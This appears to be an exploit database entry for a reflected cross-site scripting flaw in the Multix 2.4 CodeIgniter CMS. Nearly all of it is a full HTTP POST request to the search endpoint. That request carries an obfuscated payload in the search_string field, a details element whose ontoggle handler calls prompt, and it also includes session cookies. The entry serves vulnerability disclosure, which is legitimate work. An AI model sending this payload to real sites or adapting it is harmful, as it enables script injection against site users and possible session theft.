Multix 2.4 Cross Site Scripting

🗓️ 22 Sep 2022 00:00:00Reported by th3d1ggerType

packetstorm🔗 packetstormsecurity.com👁 248 Views

Multix 2.4 Cross Site Scripting exploit on Ubuntu 18.0

`# Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Reflected Cross Site Scripting  
# Exploit Author: th3d1gger  
# Vendor Homepage: https://codecanyon.net  
# Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596  
# Version: Version 2.4  
# Tested on Ubuntu 18.04  
  
  
-------Request-----------  
POST /search HTTP/1.1  
Host: localhost  
Content-Length: 24  
Cache-Control: max-age=0  
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"  
Origin: http://localhost  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36  
Content-Type: application/x-www-form-urlencoded  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Dest: empty  
Referer: http://localhost/search  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; ci_session=b3568d851b75f1b0191447e7b8ba35860e8c8e56; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; TawkConnectionTime=0; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663795200266%7D  
Connection: close  
  
search_string=<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>&form1=  
  
`

22 Sep 2022 00:00Current

7.4High risk

Vulners AI Score7.4